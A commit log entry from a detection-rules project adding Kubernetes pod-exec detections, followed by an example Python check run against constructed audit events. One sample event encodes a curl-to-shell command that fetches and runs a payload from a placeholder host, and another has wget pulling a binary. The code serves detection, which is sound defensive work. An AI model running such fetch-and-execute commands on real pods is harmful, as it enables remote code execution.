Samirbous e4746c3a83 [New] Suspicious Kubernetes Pod Exec (#5978)
* [New] Kubernetes Pod Exec with Curl or Wget to HTTPS

Detects pod or attach `exec` API calls where the decoded request query implies curl or wget fetching an https URL (avoid noisy local http services).

* Create execution_kubernetes_pod_exec_potential_reverse_shell.toml

* Update execution_kubernetes_pod_exec_curl_wget_https.toml

* Update execution_kubernetes_pod_exec_potential_reverse_shell.toml

* ++

* ++

* Apply suggestion from @terrancedejesus

Co-authored-by: Terrance DeJesus <99630311+terrancedejesus@users.noreply.github.com>

* Apply suggestion from @terrancedejesus

Co-authored-by: Terrance DeJesus <99630311+terrancedejesus@users.noreply.github.com>

* Apply suggestion from @terrancedejesus

Co-authored-by: Terrance DeJesus <99630311+terrancedejesus@users.noreply.github.com>

* Apply suggestion from @terrancedejesus

Co-authored-by: Terrance DeJesus <99630311+terrancedejesus@users.noreply.github.com>

* Apply suggestion from @terrancedejesus

Co-authored-by: Terrance DeJesus <99630311+terrancedejesus@users.noreply.github.com>

* Apply suggestion from @terrancedejesus

Co-authored-by: Terrance DeJesus <99630311+terrancedejesus@users.noreply.github.com>

* Update execution_kubernetes_pod_exec_curl_wget_https.toml

* Update execution_kubernetes_pod_exec_potential_reverse_shell.toml

* Update credential_access_kubernetes_pod_exec_cloud_instance_metadata.toml

* Update credential_access_kubernetes_pod_exec_sensitive_file_access.toml

* Update execution_kubernetes_pod_exec_curl_wget_https.toml

* Update credential_access_kubernetes_pod_exec_sensitive_file_access.toml

* Update credential_access_kubernetes_pod_exec_cloud_instance_metadata.toml

---------

Co-authored-by: Terrance DeJesus <99630311+terrancedejesus@users.noreply.github.com>
2026-05-04 22:42:34 +01:00
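The check the commit message describes, as an added example and not the rule's own query or any code from the detection-rules repository: it walks constructed Kubernetes audit events (the `example.invalid` host and pod names are made up), URL-decodes the repeated `command=` parameters of a pod `exec` or `attach` request, and flags only curl or wget fetching an `https://` URL, so a local `http://` health check is left alone.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed sample audit events (not real data). Only the fields the check
# reads are present: objectRef.resource/subresource and requestURI.
SAMPLE_EVENTS = [
    {"verb": "create",
     "objectRef": {"resource": "pods", "subresource": "exec"},
     "requestURI": "/api/v1/namespaces/default/pods/web-0/exec"
                   "?command=sh&command=-c"
                   "&command=curl+-s+https%3A%2F%2Fexample.invalid%2Fpayload.sh+%7C+sh"
                   "&stdout=true"},
    {"verb": "create",
     "objectRef": {"resource": "pods", "subresource": "exec"},
     "requestURI": "/api/v1/namespaces/default/pods/web-0/exec"
                   "?command=curl&command=http%3A%2F%2F127.0.0.1%3A8080%2Fhealthz"
                   "&stdout=true"},
    {"verb": "create",
     "objectRef": {"resource": "pods", "subresource": "attach"},
     "requestURI": "/api/v1/namespaces/default/pods/web-0/attach"
                   "?command=wget&command=-qO-"
                   "&command=https%3A%2F%2Fexample.invalid%2Fbin&stdin=true"},
    {"verb": "get",
     "objectRef": {"resource": "pods", "subresource": "log"},
     "requestURI": "/api/v1/namespaces/default/pods/web-0/log?container=app"},
]


def decoded_command(request_uri):
    """Rebuild the exec/attach command line from the request query.
    Each argv element arrives as its own `command=` parameter; parse_qs
    percent-decodes them and turns '+' back into spaces."""
    query = urlsplit(request_uri).query
    return " ".join(parse_qs(query).get("command", []))


def is_suspicious_exec(event):
    """True when a pod exec/attach request runs curl or wget against https."""
    ref = event.get("objectRef", {})
    if ref.get("resource") != "pods" or ref.get("subresource") not in ("exec", "attach"):
        return False
    cmd = decoded_command(event.get("requestURI", "")).lower()
    tokens = cmd.split()
    # Match a bare or path-qualified fetcher binary anywhere in the argv.
    has_fetcher = any(t in ("curl", "wget") or t.endswith(("/curl", "/wget")) for t in tokens)
    # Plain http:// (e.g. a local health endpoint) is deliberately not matched.
    return has_fetcher and "https://" in cmd


def flag_events(events):
    """Return the requestURI of every event the check fires on."""
    return [e["requestURI"] for e in events if is_suspicious_exec(e)]
```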